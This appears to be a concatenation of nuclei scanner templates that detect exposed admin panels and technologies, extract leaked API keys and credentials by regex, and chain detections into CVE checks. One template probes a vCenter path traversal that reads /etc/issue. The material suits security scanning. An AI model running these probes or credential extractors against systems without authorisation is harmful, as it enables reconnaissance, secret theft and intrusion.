11 | - tags: phpmyadmin 12 | -------------------------------------------------------------------------------- /exposed-panels/couchdb-fauxton.yaml: -------------------------------------------------------------------------------- 1 | id: couchdb-fauxton 2 | 3 | info: 4 | name: Apache CouchDB Fauxton Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Project Fauxton' -------------------------------------------------------------------------------- /exposed-panels/flink-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: flink-exposure 2 | 3 | info: 4 | name: Apache Flink Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 
'Apache Flink Web Dashboard' -------------------------------------------------------------------------------- /file/keys/credentials.yaml: -------------------------------------------------------------------------------- 1 | id: basic-auth-creds 2 | 3 | info: 4 | name: Basic Auth Credentials 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]" -------------------------------------------------------------------------------- /workflows/aem-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: aem-workflow 2 | 3 | info: 4 | name: Adobe Experience Manager Security Checks 5 | author: dhiyaneshDK 6 | description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/aem-detection.yaml 10 | subtemplates: 11 | - tags: aem -------------------------------------------------------------------------------- /workflows/harbor-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: harbor-workflow 2 | 3 | info: 4 | name: Harbor Security Checks 5 | author: pikpikcu 6 | description: A simple workflow that runs all Harbor related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/harbor-detect.yaml 10 | subtemplates: 11 | - template: cves/2019/CVE-2019-16097.yaml -------------------------------------------------------------------------------- /workflows/thinkcmf-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thinkcmf-workflow 2 | info: 3 | name: ThinkCMF Security Checks 4 | author: pdteam 5 | description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target. 
6 | 7 | workflows: 8 | - template: technologies/thinkcmf-detection.yaml 9 | subtemplates: 10 | - template: vulnerabilities/thinkcmf/ -------------------------------------------------------------------------------- /technologies/weblogic-detect.yaml: -------------------------------------------------------------------------------- 1 | id: weblogic-detect 2 | 3 | info: 4 | name: Detect Weblogic 5 | author: bing0o 6 | severity: info 7 | tags: tech,weblogic 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/console/login/LoginForm.jsp" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "WebLogic" 18 | -------------------------------------------------------------------------------- /exposed-panels/citrix-vpn-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-vpn-detect 2 | 3 | info: 4 | name: Citrix VPN Detection 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/vpn/index.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Citrix Gateway" 17 | -------------------------------------------------------------------------------- /exposed-panels/cx-cloud-login.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-login 2 | 3 | info: 4 | name: CX Cloud 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | - '{{BaseURL}}/cxcum/' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "CX Cloud" -------------------------------------------------------------------------------- /exposed-panels/hadoop-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: hadoop-exposure 2 | 3 | info: 4 | name: Apache Hadoop Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/dfshealth.html' 
13 | matchers: 14 | - type: word 15 | words: 16 | - '' -------------------------------------------------------------------------------- /exposed-panels/kafka-connect-ui.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-connect-ui 2 | 3 | info: 4 | name: Apache Kafka Connect UI Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kafka Connect UI' -------------------------------------------------------------------------------- /exposed-panels/netscaler-gateway.yaml: -------------------------------------------------------------------------------- 1 | id: netscaler-gateway 2 | 3 | info: 4 | name: Netscaler gateway 5 | author: joeldeleep 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/vpn/index.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - Netscaler Gateway 17 | -------------------------------------------------------------------------------- /exposed-panels/rabbitmq-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-dashboard 2 | 3 | info: 4 | name: RabbitMQ Dashboard 5 | author: fyoorer 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | matchers: 14 | - type: word 15 | words: 16 | - "RabbitMQ Management" 17 | part: body 18 | -------------------------------------------------------------------------------- /file/android/webview-javascript.yaml: -------------------------------------------------------------------------------- 1 | id: webview-javascript-enabled 2 | 3 | info: 4 | name: Webview JavaScript enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - 
"Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" -------------------------------------------------------------------------------- /workflows/cacti-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: cacti-workflow 2 | 3 | info: 4 | name: Cacti Checks 5 | author: pikpikcu 6 | description: A simple workflow that runs all Cacti related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/cacti-detect.yaml 10 | subtemplates: 11 | - template: vulnerabilities/other/cacti-weathermap-file-write.yaml -------------------------------------------------------------------------------- /workflows/liferay-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: liferay-workflow 2 | 3 | info: 4 | name: Liferay Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all liferay related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/liferay-portal-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-7961.yaml -------------------------------------------------------------------------------- /workflows/springboot-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: springboot-workflow 2 | 3 | info: 4 | name: Spring Boot Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/springboot-actuator.yaml 10 | subtemplates: 11 | - tags: springboot 12 | -------------------------------------------------------------------------------- /file/keys/paypal-braintree-token.yaml: -------------------------------------------------------------------------------- 1 | id: paypal-braintree-token 2 | 3 | info: 4 | name: Paypal Braintree Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" -------------------------------------------------------------------------------- /exposed-panels/call-break-cms.yaml: -------------------------------------------------------------------------------- 1 | id: call-break-cms 2 | 3 | info: 4 | name: Call Break CMS 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Call Break CMS' 18 | condition: and 19 | -------------------------------------------------------------------------------- /file/android/certificate-validation.yaml: -------------------------------------------------------------------------------- 1 | id: improper-certificate-validation 2 | 3 | info: 4 | name: Improper Certificate Validation 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/SslErrorHandler;->proceed()V" -------------------------------------------------------------------------------- /technologies/cockpit-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cockpit-detect 2 | 3 | info: 4 | name: Detect Agentejo Cockpit 5 | author: dwisiswant0 6 | severity: info 7 | tags: tech,cockpit 8 | 9 | requests: 10 | - method: 
GET 11 | path: 12 | - "{{BaseURL}}/auth/login" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Authenticate Please!" 17 | -------------------------------------------------------------------------------- /workflows/bigip-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: bigip-workflow 2 | 3 | info: 4 | name: F5 BIG-IP Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all BigIP related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/bigip-config-utility-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-5902.yaml 12 | -------------------------------------------------------------------------------- /.yamllint: -------------------------------------------------------------------------------- 1 | --- 2 | extends: default 3 | 4 | ignore: | 5 | .pre-commit-config.yaml 6 | .github/workflows/*.yml 7 | 8 | rules: 9 | document-start: disable 10 | line-length: disable 11 | new-lines: disable 12 | new-line-at-end-of-file: disable 13 | truthy: disable 14 | comments: 15 | require-starting-space: true 16 | ignore-shebangs: true 17 | min-spaces-from-content: 1 -------------------------------------------------------------------------------- /exposed-panels/kafka-topics-ui.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-topics-ui 2 | 3 | info: 4 | name: Apache Kafka Topics UI Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kafka Topics UI - Browse Kafka Data' -------------------------------------------------------------------------------- /exposed-panels/kubernetes-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-dashboard 2 | 3 | info: 4 | name: Kubernetes Console Exposure 5 | 
author: pdteam 6 | severity: low 7 | tags: panel,kubernetes,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Kubernetes Dashboard" 17 | -------------------------------------------------------------------------------- /exposed-panels/rocketmq-console-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: rocketmq-console-exposure 2 | 3 | info: 4 | name: Apache RocketMQ Console Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "RocketMq-console-ng" -------------------------------------------------------------------------------- /file/keys/firebase-database.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-database 2 | 3 | info: 4 | name: Firebase Database Detect 5 | author: gaurang 6 | severity: info 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[a-z0-9.-]+\\.firebaseio\\.com" 17 | - "[a-z0-9.-]+\\.firebaseapp\\.com" -------------------------------------------------------------------------------- /file/keys/slack-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook 2 | 3 | info: 4 | name: Slack Webhook 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" 17 | -------------------------------------------------------------------------------- /exposed-panels/kronos-workforce-central.yaml: -------------------------------------------------------------------------------- 1 | id: kronos-workforce-central 2 | 3 | 
info: 4 | name: Kronos Workforce Central Panel 5 | author: emadshanab 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/wfc/portal' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kronos Workforce Central' -------------------------------------------------------------------------------- /exposed-panels/zipkin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: zipkin-exposure 2 | 3 | info: 4 | name: Zipkin Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/zipkin/" 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "webpackJsonpzipkin-lens" -------------------------------------------------------------------------------- /exposures/tokens/picatic/picatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: picatic-api-key 2 | 3 | info: 4 | name: Picatic API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'sk_live_[0-9a-z]{32}' -------------------------------------------------------------------------------- /file/keys/amazon-mws-auth-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-mws-auth-token-value 2 | 3 | info: 4 | name: Amazon MWS Auth Token 5 | author: gaurang 6 | severity: medium 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" -------------------------------------------------------------------------------- /vulnerabilities/wordpress/wp-xmlrpc.yaml: 
-------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xmlrpc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'XML-RPC server accepts POST requests only.' 17 | -------------------------------------------------------------------------------- /workflows/netsweeper-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: netsweeper-workflow 2 | 3 | info: 4 | name: Netsweeper Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all netsweeper related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/netsweeper-webadmin-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-13167.yaml -------------------------------------------------------------------------------- /exposed-panels/kafka-monitoring.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-monitoring 2 | 3 | info: 4 | name: Apache Kafka Monitor Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '>KafkaMonitor' 18 | - '>Kafka Monitor GUI' -------------------------------------------------------------------------------- /exposed-panels/mantis-detect.yaml: -------------------------------------------------------------------------------- 1 | id: mantis-detect 2 | 3 | info: 4 | name: Mantis portal detection 5 | author: makyotox 6 | severity: info 7 | tags: panel,mantis 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login_page.php" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "MantisBT" 18 | part: body 19 | 
-------------------------------------------------------------------------------- /exposed-panels/solarwinds-orion.yaml: -------------------------------------------------------------------------------- 1 | id: solarwinds-orion 2 | 3 | info: 4 | name: SolarWinds Orion Panel 5 | author: puzzlepeaches 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Orion/Login.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "SolarWinds Orion" 18 | part: body 19 | -------------------------------------------------------------------------------- /exposed-panels/sonarqube-login.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-login 2 | 3 | info: 4 | name: SonarQube panel detect 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sessions/new" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "SonarQube" 18 | part: body 19 | -------------------------------------------------------------------------------- /exposures/tokens/bitly/bitly-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: bitly-secret-key 2 | 3 | info: 4 | name: Bitly Secret Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,bitly 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'R_[0-9a-f]{32}' -------------------------------------------------------------------------------- /file/android/biometric-detect.yaml: -------------------------------------------------------------------------------- 1 | id: biometric-detect 2 | 3 | info: 4 | name: Biometric or Fingerprint detect 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - 
"android.permission.USE_FINGERPRINT" 17 | - "android.permission.USE_BIOMETRIC" -------------------------------------------------------------------------------- /workflows/samsung-wlan-ap-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: samsung-wlan-ap-workflow 2 | 3 | info: 4 | name: Samsung Wlan AP (WEA453e) Checks 5 | author: pikpikcu 6 | description: A simple workflow that runs all samsung WlanAP related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: default-logins/samsung/samsung-wlan-ap-default-credentials.yaml 10 | - template: vulnerabilities/samsung/ -------------------------------------------------------------------------------- /dns/servfail-refused-hosts.yaml: -------------------------------------------------------------------------------- 1 | id: servfail-refused-hosts 2 | 3 | info: 4 | name: Servfail Host Finder 5 | author: pdteam 6 | severity: info 7 | tags: dns 8 | 9 | dns: 10 | - name: "{{FQDN}}" 11 | type: A 12 | class: inet 13 | recursion: true 14 | retries: 3 15 | matchers: 16 | - type: word 17 | words: 18 | - "SERVFAIL" 19 | - "REFUSED" 20 | -------------------------------------------------------------------------------- /exposed-panels/aims-password-mgmt-client.yaml: -------------------------------------------------------------------------------- 1 | id: aims-password-mgmt-client 2 | 3 | info: 4 | name: Aims Password Management Client Detect 5 | author: iamthefrogy 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/aims/ps/" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Avatier Corporation" 18 | -------------------------------------------------------------------------------- /exposed-panels/sonicwall-sslvpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-sslvpn-panel 2 | 3 | info: 4 | name: SonicWall Virtual Office SSLVPN Panel 5 | author: 
PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cgi-bin/welcome" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Virtual Office" 17 | -------------------------------------------------------------------------------- /exposed-panels/supervpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: supervpn-detect 2 | 3 | info: 4 | name: SuperVPN panel detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/login.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Sign In-SuperVPN" 17 | part: body 18 | -------------------------------------------------------------------------------- /exposures/tokens/newrelic/newrelic-admin-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-admin-api-key 2 | 3 | info: 4 | name: Admin API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRAA-[a-f0-9]{27}' -------------------------------------------------------------------------------- /exposures/tokens/newrelic/newrelic-rest-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-rest-api-key 2 | 3 | info: 4 | name: REST API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRRA-[a-f0-9]{42}' -------------------------------------------------------------------------------- /file/android/webview-universal-access.yaml: -------------------------------------------------------------------------------- 1 | id: webview-universal-access 2 
| 3 | info: 4 | name: Webview Universal Access enabled 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" -------------------------------------------------------------------------------- /network/smtp-detection.yaml: -------------------------------------------------------------------------------- 1 | id: smtp-service-detection 2 | 3 | info: 4 | name: SMTP Service Detection 5 | author: pussycat0x 6 | severity: info 7 | tags: network,service,smtp 8 | 9 | network: 10 | - inputs: 11 | - data: "\r\n" 12 | host: 13 | - "{{Hostname}}" 14 | - "{{Hostname}}:25" 15 | matchers: 16 | - type: word 17 | words: 18 | - "SMTP" 19 | -------------------------------------------------------------------------------- /technologies/maian-cart-detect.yaml: -------------------------------------------------------------------------------- 1 | id: maian-cart-detect 2 | 3 | info: 4 | name: Maian Cart Detection 5 | author: pdteam 6 | severity: info 7 | tags: tech,maian 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/favicon.ico" 13 | 14 | matchers: 15 | - type: dsl 16 | dsl: 17 | - "status_code==200 && (\"-498581627\" == mmh3(base64_py(body)))" -------------------------------------------------------------------------------- /technologies/s3-detect.yaml: -------------------------------------------------------------------------------- 1 | id: s3-detect 2 | 3 | info: 4 | name: Detect Amazon-S3 Bucket 5 | author: melbadry9 6 | severity: info 7 | tags: aws,s3,bucket,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/%c0" 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" 17 | part: body 18 | -------------------------------------------------------------------------------- /technologies/sql-server-reporting.yaml: 
-------------------------------------------------------------------------------- 1 | id: sql-server-reporting 2 | 3 | info: 4 | name: Detect Microsoft SQL Server Reporting 5 | author: puzzlepeaches 6 | severity: info 7 | tags: tech,micrsoft 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Reports/Pages/Folder.aspx" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Report Manager" 17 | -------------------------------------------------------------------------------- /vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-vcenter-lfi-linux 2 | 3 | info: 4 | name: Vmware Vcenter LFI for Linux appliances 5 | author: PR3R00T 6 | severity: high 7 | tags: vmware,lfi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/eam/vib?id=/etc/issue" 13 | matchers: 14 | - type: word 15 | words: 16 | - "vCenter Server" -------------------------------------------------------------------------------- /workflows/rabbitmq-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-workflow 2 | 3 | info: 4 | name: RabbitMQ Security Checks 5 | author: fyoorer 6 | description: A simple workflow that runs all rabbitmq related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/rabbitmq-dashboard.yaml 10 | 11 | subtemplates: 12 | - template: default-logins/rabbitmq/rabbitmq-default-admin.yaml -------------------------------------------------------------------------------- /exposed-panels/bazarr-login.yaml: -------------------------------------------------------------------------------- 1 | id: bazarr-login-detect 2 | 3 | info: 4 | name: Bazarr Login Detect 5 | author: r3dg33k 6 | severity: info 7 | reference: https://www.bazarr.media/ 8 | tags: panel,bazarr,login 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/login" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Bazarr' -------------------------------------------------------------------------------- /exposed-panels/compal-panel.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/common_page/login.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "" 17 | part: body 18 | -------------------------------------------------------------------------------- /exposed-panels/saferoads-vms-login.yaml: -------------------------------------------------------------------------------- 1 | id: saferoads-vms-login 2 | 3 | info: 4 | name: Saferoads VMS Login 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | reference: https://www.exploit-db.com/ghdb/6941 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/login.html' 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Saferoads VMS' -------------------------------------------------------------------------------- /exposures/tokens/slack/slack-user-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-user-token 2 | 3 | info: 4 | name: Slack User token 
disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "xoxp-[0-9A-Za-z\\-]{72}" -------------------------------------------------------------------------------- /exposures/tokens/stripe/stripe-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-secret-key 2 | 3 | info: 4 | name: Stripe Secret Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'sk_(?:live|test)_[0-9a-zA-Z]{24}' -------------------------------------------------------------------------------- /takeovers/urge-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: surge-takeover 2 | 3 | info: 4 | name: surge takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - project not found -------------------------------------------------------------------------------- /workflows/azkaban-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: azkaban-workflow 2 | 3 | info: 4 | name: Azkaban Security Checks 5 | author: pdteam 6 | description: A simple workflow that runs all Azkaban related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/azkaban-web-client.yaml 10 | subtemplates: 11 | - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml 12 | -------------------------------------------------------------------------------- /workflows/thinkphp-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: thinkphp-workflow 2 | info: 3 | name: ThinkPHP Security Checks 4 | author: dr_set 5 | description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target. 6 | 7 | workflows: 8 | - template: technologies/tech-detect.yaml 9 | matchers: 10 | - name: thinkphp 11 | subtemplates: 12 | - template: vulnerabilities/thinkphp/ -------------------------------------------------------------------------------- /exposures/apis/wsdl-api.yaml: -------------------------------------------------------------------------------- 1 | id: wsdl-api 2 | 3 | info: 4 | name: wsdl-detect 5 | author: jarijaas 6 | severity: info 7 | tags: exposure,api 8 | description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/?wsdl" 14 | matchers: 15 | - type: word 16 | words: 17 | - "wsdl:definitions" -------------------------------------------------------------------------------- /exposures/tokens/google/oauth-access-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-oauth-access-key 2 | 3 | info: 4 | name: Google OAuth Access Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'ya29\.[0-9A-Za-z\-_]+' -------------------------------------------------------------------------------- /exposures/tokens/newrelic/newrelic-insights-key.yaml: 
-------------------------------------------------------------------------------- 1 | id: newrelic-insights-key 2 | 3 | info: 4 | name: Insights Keys Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}' -------------------------------------------------------------------------------- /exposures/tokens/sendgrid/sendgrid-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: sendgrid-api-key 2 | 3 | info: 4 | name: Sendgrid API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}' -------------------------------------------------------------------------------- /exposures/tokens/slack/slack-bot-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-bot-token 2 | 3 | info: 4 | name: Slack access token 5 | author: nadino 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "xoxb-[0-9A-Za-z\\-]{51}" -------------------------------------------------------------------------------- /file/android/webview-addjavascript-interface.yaml: -------------------------------------------------------------------------------- 1 | id: webview-addjavascript-interface 2 | 3 | info: 4 | name: Webview addJavascript Interface Usage 5 | author: gaurang 6 | severity: info 